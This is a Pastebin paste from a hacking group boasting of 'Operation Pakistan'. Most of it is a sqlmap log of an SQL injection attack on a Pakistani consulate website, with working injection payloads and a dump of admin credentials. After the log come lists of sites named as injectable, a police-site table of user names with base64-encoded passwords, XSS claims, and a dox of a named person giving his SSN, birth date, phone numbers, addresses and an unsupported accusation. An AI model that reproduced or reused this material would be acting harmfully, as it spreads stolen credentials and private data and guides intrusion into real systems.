API tools faq
paste
Advertisement
Axid

Operation Pakistan September 6th-8th (Axid)

Axid
Dec 11th, 2014
656
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.85 KB | None | 0 0
raw download clone embed print report
  1. ____ ____ ____ ____ ____ ____ ___ ____ _ _ _ ____ ___ ____ _ _ ____ ____ _ _ _ _ _ _
  2. | __ |___ | | |__/ | |___ |__] |__| |_/ | [__ | |__| |\ | |___ |__| |\/| | | \_/
  3. |__] | |__| | \ |___ |___ | | | | \_ | ___] | | | | \| | | | | | | |___ |
  4.  
  5. http://en.wikipedia.org/wiki/G_Force_Pakistan
  6.  
  7.  
  8.  
  9. #Operation #Pakistan.
  10.  
  11. Hacking at its Finest.
  12.  
  13. ~XTAM4
  14.  
  15. ~Mr.Instinct
  16.  
  17. ~G Force Family
  18.  
  19. ~Corleone Family
  20.  
  21. #XTAM4
  22. Operation planned by: Mr.Instinct
  23. Main Contributors: Xtam4, Axid Burn and Balalaika.
  24.  
  25.  
  26.  
  27. Main Target: http://www.pakconsulatejeddah.gov.pk/index.php
  28.  
  29.  
  30.  
  31. [*] starting at 15:13:28
  32.  
  33. [15:13:31] [INFO] testing connection to the target URL
  34. [15:13:37] [INFO] testing if the target URL is stable. This can take a couple of seconds
  35. [15:13:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor
  36.  
  37. injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a
  38.  
  39. string or regular expression to match on
  40. how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
  41. [15:14:08] [INFO] testing if GET parameter 'option' is dynamic
  42. [15:14:09] [INFO] confirming that GET parameter 'option' is dynamic
  43. [15:14:11] [INFO] GET parameter 'option' is dynamic
  44. [15:14:12] [WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable
  45. [15:14:12] [INFO] testing for SQL injection on GET parameter 'option'
  46. [15:14:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  47. [15:14:13] [WARNING] reflective value(s) found and filtering out
  48. [15:14:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  49. [15:14:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  50. [15:14:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  51. [15:14:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  52. [15:15:01] [INFO] testing 'MySQL inline queries'
  53. [15:15:02] [INFO] testing 'PostgreSQL inline queries'
  54. [15:15:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  55. [15:15:06] [INFO] testing 'Oracle inline queries'
  56. [15:15:07] [INFO] testing 'SQLite inline queries'
  57. [15:15:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  58. [15:15:08] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as
  59.  
  60. possible (e.g. 10 or more)
  61. [15:15:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  62. [15:15:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  63. [15:15:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  64. [15:15:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  65. [15:15:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  66. [15:16:01] [INFO] testing 'Oracle AND time-based blind'
  67. [15:16:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  68. [15:17:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  69. [15:17:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly
  70.  
  71. set it using option '--dbms'
  72. [15:19:43] [WARNING] GET parameter 'option' is not injectable
  73. [15:19:43] [INFO] testing if GET parameter 'item' is dynamic
  74. [15:19:44] [INFO] confirming that GET parameter 'item' is dynamic
  75. [15:19:45] [INFO] GET parameter 'item' is dynamic
  76. [15:19:45] [WARNING] heuristic (basic) test shows that GET parameter 'item' might not be injectable
  77. [15:19:45] [INFO] testing for SQL injection on GET parameter 'item'
  78. [15:19:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  79. [15:20:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  80. [15:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  81. [15:20:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  82. [15:20:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  83. [15:20:44] [INFO] testing 'MySQL inline queries'
  84. [15:20:45] [INFO] testing 'PostgreSQL inline queries'
  85. [15:20:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  86. [15:20:50] [INFO] testing 'Oracle inline queries'
  87. [15:20:52] [INFO] testing 'SQLite inline queries'
  88. [15:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  89. [15:21:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  90. [15:21:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  91. [15:21:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  92. [15:21:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  93. [15:21:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  94. [15:21:47] [INFO] testing 'Oracle AND time-based blind'
  95. [15:21:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  96. [15:23:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  97. [15:25:16] [WARNING] GET parameter 'item' is not injectable
  98. [15:25:16] [INFO] testing if GET parameter 'item_id' is dynamic
  99. [15:25:17] [INFO] confirming that GET parameter 'item_id' is dynamic
  100. [15:25:18] [INFO] GET parameter 'item_id' is dynamic
  101. [15:25:19] [INFO] heuristic (basic) test shows that GET parameter 'item_id' might be injectable (possible DBMS: 'PostgreSQL or
  102.  
  103. MySQL')
  104. [15:25:19] [INFO] testing for SQL injection on GET parameter 'item_id'
  105. heuristic (parsing) test showed that the back-end DBMS could be 'PostgreSQL or MySQL'. Do you want to skip test payloads specific
  106.  
  107. for other DBMSes? [Y/n] y
  108. do you want to include all tests for 'PostgreSQL or MySQL' extending provided level (1) and risk (1)? [Y/n] y
  109. [15:25:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  110. [15:26:15] [INFO] GET parameter 'item_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  111. [15:26:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  112. [15:26:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  113. [15:26:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
  114. [15:26:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
  115. [15:26:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  116. [15:26:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
  117. [15:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  118. [15:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
  119. [15:26:58] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
  120. [15:27:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
  121. [15:27:06] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
  122. [15:27:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
  123. [15:27:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
  124. [15:27:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
  125. [15:27:12] [INFO] testing 'PostgreSQL error-based - Parameter replace'
  126. [15:27:13] [INFO] testing 'MySQL inline queries'
  127. [15:27:15] [INFO] testing 'PostgreSQL inline queries'
  128. [15:27:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  129. [15:27:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  130. [15:27:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  131. [15:27:21] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
  132. [15:27:23] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
  133. [15:27:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  134. [15:27:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
  135. [15:27:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
  136. [15:27:52] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
  137. [15:28:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  138. [15:28:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
  139. [15:28:10] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
  140. [15:28:12] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
  141. [15:28:16] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
  142. [15:29:16] [INFO] GET parameter 'item_id' is 'MySQL > 5.0.11 OR time-based blind' injectable
  143. [15:29:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  144. [15:29:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other
  145.  
  146. potential injection technique found
  147. [15:29:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query
  148.  
  149. columns. Automatically extending the range for current UNION query injection technique test
  150. [15:29:28] [INFO] target URL appears to have 13 columns in query
  151. [15:30:01] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  152. GET parameter 'item_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  153. sqlmap identified the following injection points with a total of 429 HTTP(s) requests:
  154. ---
  155. Place: GET
  156. Parameter: item_id
  157. Type: boolean-based blind
  158. Title: AND boolean-based blind - WHERE or HAVING clause
  159. Payload: option=page&item=show&item_id=51 AND 2145=2145
  160.  
  161. Type: UNION query
  162. Title: MySQL UNION query (NULL) - 13 columns
  163. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  164.  
  165. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  166.  
  167. Type: AND/OR time-based blind
  168. Title: MySQL > 5.0.11 OR time-based blind
  169. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  170. ---
  171. [15:32:31] [INFO] the back-end DBMS is MySQL
  172. web application technology: Apache 2.2.23, PHP 5.2.17
  173. back-end DBMS: MySQL 5.0.11
  174. [15:32:31] [INFO] fetching database names
  175. [15:32:47] [INFO] the SQL query used returns 3 entries
  176. [15:32:49] [INFO] retrieved: "information_schema"
  177. [15:32:50] [INFO] retrieved: "pakcons_consulate"
  178. [15:32:58] [INFO] retrieved: "pakcons_tns"
  179. available databases [3]:
  180. [*] information_schema
  181. [*] pakcons_consulate
  182. [*] pakcons_tns
  183.  
  184. [15:32:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  185.  
  186. [*] shutting down at 15:32:58
  187.  
  188. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate --
  189.  
  190. tables
  191.  
  192. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  193. http://sqlmap.org
  194.  
  195. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  196.  
  197. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  198.  
  199. any misuse or damage caused by this program
  200.  
  201. [*] starting at 15:34:27
  202.  
  203. [15:34:27] [INFO] resuming back-end DBMS 'mysql'
  204. [15:34:29] [INFO] testing connection to the target URL
  205. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  206. ---
  207. Place: GET
  208. Parameter: item_id
  209. Type: boolean-based blind
  210. Title: AND boolean-based blind - WHERE or HAVING clause
  211. Payload: option=page&item=show&item_id=51 AND 2145=2145
  212.  
  213. Type: UNION query
  214. Title: MySQL UNION query (NULL) - 13 columns
  215. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  216.  
  217. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  218.  
  219. Type: AND/OR time-based blind
  220. Title: MySQL > 5.0.11 OR time-based blind
  221. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  222. ---
  223. [15:34:34] [INFO] the back-end DBMS is MySQL
  224. web application technology: Apache 2.2.23, PHP 5.2.17
  225. back-end DBMS: MySQL 5.0.11
  226. [15:34:34] [INFO] fetching tables for database: 'pakcons_consulate'
  227. [15:34:38] [INFO] the SQL query used returns 23 entries
  228. [15:34:39] [INFO] retrieved: "admin"
  229. [15:34:41] [INFO] retrieved: "blocks"
  230. [15:34:43] [INFO] retrieved: "gallery"
  231. [15:34:45] [INFO] retrieved: "gallery_images"
  232. [15:34:46] [INFO] retrieved: "news"
  233. [15:34:48] [INFO] retrieved: "pages"
  234. [15:34:52] [INFO] retrieved: "report_files"
  235. [15:34:53] [INFO] retrieved: "reports"
  236. [15:34:55] [INFO] retrieved: "slideshow"
  237. [15:34:56] [INFO] retrieved: "url_alias"
  238. [15:34:58] [INFO] retrieved: "users"
  239. [15:35:01] [INFO] retrieved: "videos"
  240. [15:35:02] [INFO] retrieved: "wp_commentmeta"
  241. [15:35:04] [INFO] retrieved: "wp_comments"
  242. [15:35:07] [INFO] retrieved: "wp_links"
  243. [15:35:09] [INFO] retrieved: "wp_options"
  244. [15:35:10] [INFO] retrieved: "wp_postmeta"
  245. [15:35:11] [INFO] retrieved: "wp_posts"
  246. [15:35:13] [INFO] retrieved: "wp_term_relationships"
  247. [15:35:15] [INFO] retrieved: "wp_term_taxonomy"
  248. [15:35:16] [INFO] retrieved: "wp_terms"
  249. [15:35:17] [INFO] retrieved: "wp_usermeta"
  250. [15:35:18] [INFO] retrieved: "wp_users"
  251. Database: pakcons_consulate
  252. [23 tables]
  253. +-----------------------+
  254. | admin |
  255. | blocks |
  256. | gallery |
  257. | gallery_images |
  258. | news |
  259. | pages |
  260. | report_files |
  261. | reports |
  262. | slideshow |
  263. | url_alias |
  264. | users |
  265. | videos |
  266. | wp_commentmeta |
  267. | wp_comments |
  268. | wp_links |
  269. | wp_options |
  270. | wp_postmeta |
  271. | wp_posts |
  272. | wp_term_relationships |
  273. | wp_term_taxonomy |
  274. | wp_terms |
  275. | wp_usermeta |
  276. | wp_users |
  277. +-----------------------+
  278.  
  279. [15:35:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  280.  
  281. [*] shutting down at 15:35:18
  282.  
  283. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T
  284.  
  285. admin --columns
  286.  
  287. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  288. http://sqlmap.org
  289.  
  290. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  291.  
  292. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  293.  
  294. any misuse or damage caused by this program
  295.  
  296. [*] starting at 15:36:44
  297.  
  298. [15:36:45] [INFO] resuming back-end DBMS 'mysql'
  299. [15:36:47] [INFO] testing connection to the target URL
  300. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  301. ---
  302. Place: GET
  303. Parameter: item_id
  304. Type: boolean-based blind
  305. Title: AND boolean-based blind - WHERE or HAVING clause
  306. Payload: option=page&item=show&item_id=51 AND 2145=2145
  307.  
  308. Type: UNION query
  309. Title: MySQL UNION query (NULL) - 13 columns
  310. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  311.  
  312. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  313.  
  314. Type: AND/OR time-based blind
  315. Title: MySQL > 5.0.11 OR time-based blind
  316. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  317. ---
  318. [15:36:51] [INFO] the back-end DBMS is MySQL
  319. web application technology: Apache 2.2.23, PHP 5.2.17
  320. back-end DBMS: MySQL 5.0.11
  321. [15:36:51] [INFO] fetching columns for table 'admin' in database 'pakcons_consulate'
  322. [15:36:56] [INFO] the SQL query used returns 5 entries
  323. [15:36:57] [INFO] retrieved: "id","int(11)"
  324. [15:36:58] [INFO] retrieved: "full_name","varchar(100)"
  325. [15:36:59] [INFO] retrieved: "username","varchar(100)"
  326. [15:37:01] [INFO] retrieved: "password","varchar(100)"
  327. [15:37:03] [INFO] retrieved: "email","varchar(100)"
  328. Database: pakcons_consulate
  329. Table: admin
  330. [5 columns]
  331. +-----------+--------------+
  332. | Column | Type |
  333. +-----------+--------------+
  334. | email | varchar(100) |
  335. | full_name | varchar(100) |
  336. | id | int(11) |
  337. | password | varchar(100) |
  338. | username | varchar(100) |
  339. +-----------+--------------+
  340.  
  341. [15:37:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  342.  
  343. [*] shutting down at 15:37:03
  344.  
  345. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51%27" -D pakcons_consulate
  346.  
  347. -T admin -C email,full_name,id,password,username --dump
  348.  
  349. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  350. http://sqlmap.org
  351.  
  352. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  353.  
  354. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  355.  
  356. any misuse or damage caused by this program
  357.  
  358. [*] starting at 15:38:20
  359.  
  360. [15:38:20] [WARNING] it appears that you have provided tainted parameter values ('item_id=51'') with most probably leftover
  361.  
  362. chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to
  363.  
  364. properly run
  365. Are you sure you want to continue? [y/N] n
  366.  
  367. [*] shutting down at 15:38:33
  368.  
  369. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T
  370.  
  371. admin -C email,full_name,id,password,username --dump
  372.  
  373. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  374. http://sqlmap.org
  375.  
  376. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  377.  
  378. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  379.  
  380. any misuse or damage caused by this program
  381.  
  382. [*] starting at 15:39:08
  383.  
  384. [15:39:08] [INFO] resuming back-end DBMS 'mysql'
  385. [15:39:11] [INFO] testing connection to the target URL
  386. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  387. ---
  388. Place: GET
  389. Parameter: item_id
  390. Type: boolean-based blind
  391. Title: AND boolean-based blind - WHERE or HAVING clause
  392. Payload: option=page&item=show&item_id=51 AND 2145=2145
  393.  
  394. Type: UNION query
  395. Title: MySQL UNION query (NULL) - 13 columns
  396. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  397.  
  398. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  399.  
  400. Type: AND/OR time-based blind
  401. Title: MySQL > 5.0.11 OR time-based blind
  402. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  403. ---
  404. [15:39:18] [INFO] the back-end DBMS is MySQL
  405. web application technology: Apache 2.2.23, PHP 5.2.17
  406. back-end DBMS: MySQL 5.0.11
  407. [15:39:18] [INFO] fetching columns 'email, full_name, id, password, username' for table 'admin' in database 'pakcons_consulate'
  408. [15:39:18] [INFO] the SQL query used returns 5 entries
  409. [15:39:19] [INFO] retrieved: "id","int(11)"
  410. [15:39:21] [INFO] retrieved: "full_name","varchar(100)"
  411. [15:39:22] [INFO] retrieved: "username","varchar(100)"
  412. [15:39:23] [INFO] retrieved: "password","varchar(100)"
  413. [15:39:24] [INFO] retrieved: "email","varchar(100)"
  414. [15:39:24] [INFO] fetching entries of column(s) 'email, full_name, id, password, username' for table 'admin' in database
  415.  
  416. 'pakcons_consulate'
  417. [15:39:24] [INFO] the SQL query used returns 1 entries
  418. [15:39:25] [INFO] retrieved: "amirrkkhan@gmail.com","M. Amir Khan","1","1c677...
  419. [15:39:25] [INFO] analyzing table dump for possible password hashes
  420. [15:39:25] [INFO] recognized possible password hashes in column 'password'
  421. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
  422. [15:39:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-8nqFtk.txt'
  423. do you want to crack them via a dictionary-based attack? [Y/n/q] n
  424. Database: pakcons_consulate
  425. Table: admin
  426. [1 entry]
  427. +----+----------------------+-------------+----------------------------------+--------------+
  428. | id | email | username | password | full_name |
  429. +----+----------------------+-------------+----------------------------------+--------------+
  430. | 1 | amirrkkhan@gmail.com | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan |
  431. +----+----------------------+-------------+----------------------------------+--------------+
  432.  
  433. [15:39:46] [INFO] table 'pakcons_consulate.admin' dumped to CSV file
  434.  
  435. '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk/dump/pakcons_consulate/admin.csv'
  436. [15:39:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  437.  
  438. -----------------------------------------------------------------------------------------------------------------
  439. #Mr.Instinct
  440.  
  441. http://www.stat.com.pk/search.php?modid=422
  442. http://www.hotline.pk/search.php?&visit=422
  443. http://www.playtube.pk/search.php?q=indian+songs&st=169&o=rating
  444. http://indusblog.com.pk/indusblog/indusblog%20backup/
  445. http://dev.evsoft.pk/evs/hameed/EVS%20Point%20of%20Sales/evs%20posv%20last%20backup%2027-05-14/evs%20posv/
  446. http://www.stat.com.pk/search.php?modid=422
  447. http://www.hotline.pk/search.php?&visit=422
  448. http://www.playtube.pk/search.php?q=indian+songs&st=169&o=rating
  449. http://pharmapack.pk
  450. password:djihade
  451. http://www.clickme.com.pk/search.php?searchfiled=jgfc&categoryfiled=0
  452. http://profile.hec.gov.pk/index.php?comp=forgot-password.php
  453. http://pogo.pk/new/backup-12.2.2013_00-47-59_pakistan
  454. http://indusblog.com.pk/indusblog/indusblog%20backup/
  455. http://dev.evsoft.pk/evs/hameed/EVS%20Point%20of%20Sales/evs%20posv%20last%20backup%2027-05-14/evs%20posv/
  456. http://www.clickme.com.pk/search.php?searchfiled=jgfc&categoryfiled=0
  457.  
  458. ----------------------------------------------------
  459. #Axid Burn
  460.  
  461.  
  462. http://swissbusinesscouncil.com.pk/pages.php?pageid=7'&id=4'
  463. http://www.amch.edu.pk/page_detail.php?page_id=61'
  464. http://www.amch.edu.pk/page.php?page_id=34'
  465. http://www.arttechniques.com.pk/page.php?page_id=21'
  466. http://www.mb.com.pk/products.php?id=28%27'
  467. http://www.jsm.com.pk/products/details?pr=9'
  468. http://prcs.org.pk/page.php?pg_id=52'
  469. http://www.prcs.org.pk/faq.php
  470. http://finance-mansehra.gov.pk/hospitals.php
  471. http://www.hangal.com.pk/quickLinks.php
  472.  
  473.  
  474. ----------------------------------------------------
  475. #El-Capitân Balalaika
  476.  
  477.  
  478. http://www.faisalabadpolice.gov.pk/
  479. admin panel not found
  480.  
  481. http://www.faisalabadpolice.gov.pk/page.php
  482. XSS vulnerable
  483.  
  484. +------+----------------------+--------+--------------------+
  485. | u_id | u_pass | u_type | u_name |
  486. +------+----------------------+--------+--------------------+
  487. | 6 | U2FqYU5TYWllTjc4Ng== | 0 | allahg1 |
  488. | 7 | MTIzNDU= | 1 | Balochani |
  489. | 8 | MTIzNDU= | 1 | Civil Lines |
  490. | 9 | MTIzNDU= | 1 | Rail Bazar |
  491. | 10 | MTIzNDU= | 1 | Kotwali |
  492. | 11 | MTIzNDU= | 1 | Jhang Bazar |
  493. | 12 | MTIzNDU= | 1 | Women |
  494. | 13 | MTIzNDU= | 1 | Gulberg |
  495. | 14 | MTAwMjE= | 1 | GM Abad |
  496. | 15 | MTIzNDU= | 1 | Raza Abad |
  497. | 16 | MTIzNDU= | 1 | Peoples Colony |
  498. | 17 | MTIzNDU= | 1 | Madina Town |
  499. | 18 | MTIzNDU= | 1 | Sargodha Road |
  500. | 19 | MTIzNDU= | 1 | Mansoor Abad |
  501. | 20 | MTIzNDU= | 1 | Nishat Abad |
  502. | 21 | MTIzNDU= | 1 | Millat Town |
  503. | 22 | MTIzNDU= | 1 | Chak Jhumra |
  504. | 23 | Nzg2YXNpZg== | 1 | Sahianwala |
  505. | 24 | MTIzNDU= | 1 | Batala Colony |
  506. | 25 | MTIzNDU= | 1 | D-Type Colony |
  507. | 26 | MTIzNDU= | 1 | Factory Area |
  508. | 27 | MTIzNDU= | 1 | Saman Abad |
  509. | 28 | MTIzNDU= | 1 | Dijkot |
  510. | 29 | MTIzNDU= | 1 | Sadar |
  511. | 30 | MTIzNDU= | 1 | Thekriwala |
  512. | 31 | MTIzNDU= | 1 | Sandalbar |
  513. | 32 | MTIzNDU= | 1 | City Jaranwala |
  514. | 33 | MTIzNDU= | 1 | Sadar Jaranwala |
  515. | 34 | MTIzNDU= | 1 | Satiana |
  516. | 35 | MTIzNDU= | 1 | Rodala Road |
  517. | 36 | MTIzNDU= | 1 | Lundianwala |
  518. | 37 | MTIzNDU= | 1 | Khurrianwala |
  519. | 38 | MTIzNDU= | 1 | City Samundari |
  520. | 39 | MTIzNDU= | 1 | Sadar Samundari |
  521. | 40 | MTIzNDU= | 1 | Mureed Wala |
  522. | 41 | MTIzNDU= | 1 | Tarkhani |
  523. | 42 | MTIzNDU= | 1 | City Tandlianwala |
  524. | 43 | MTIzNDU= | 1 | Sadar Tandlianwala |
  525. | 44 | MTIzNDU= | 1 | Bahlak |
  526. | 45 | bWFuem9vcg== | 1 | Garh |
  527. | 46 | MTIzNDU= | 1 | Mamon Kanjan |
  528. | 53 | b3JwMTIz | 2 | pro |
  529.  
  530.  
  531. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  532.  
  533. http://sbp.org.pk
  534.  
  535. Entire site is XSS vulnerable
  536.  
  537. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  538.  
  539. http://www.aaj.tv/
  540.  
  541. XSS vulnerable 83+
  542.  
  543.  
  544. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  545.  
  546.  
  547.  
  548.  
  549. Doxes/Hits:
  550.  
  551.  
  552. John O Brennan
  553.  
  554. SSN: 146-42-3250
  555.  
  556. DOB: 09/22/1955
  557.  
  558. Phone Number's: (703) 435-8772, (703) 738-2877, (703) 435-7720,(703) 435-8772, (703) 742-3349
  559.  
  560. Address: 13251 Point Rider Ln
  561.  
  562. Herndon, VA 20171
  563.  
  564. Previous Addresses:
  565.  
  566. PO Box 597 Warrenton, VA 20188
  567. 6857 Lafayette Park Dr Annandale, VA 22003
  568.  
  569. John O Brennan armed Al Qaeda, and Tehreek-E-Taliban in Pakistan.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!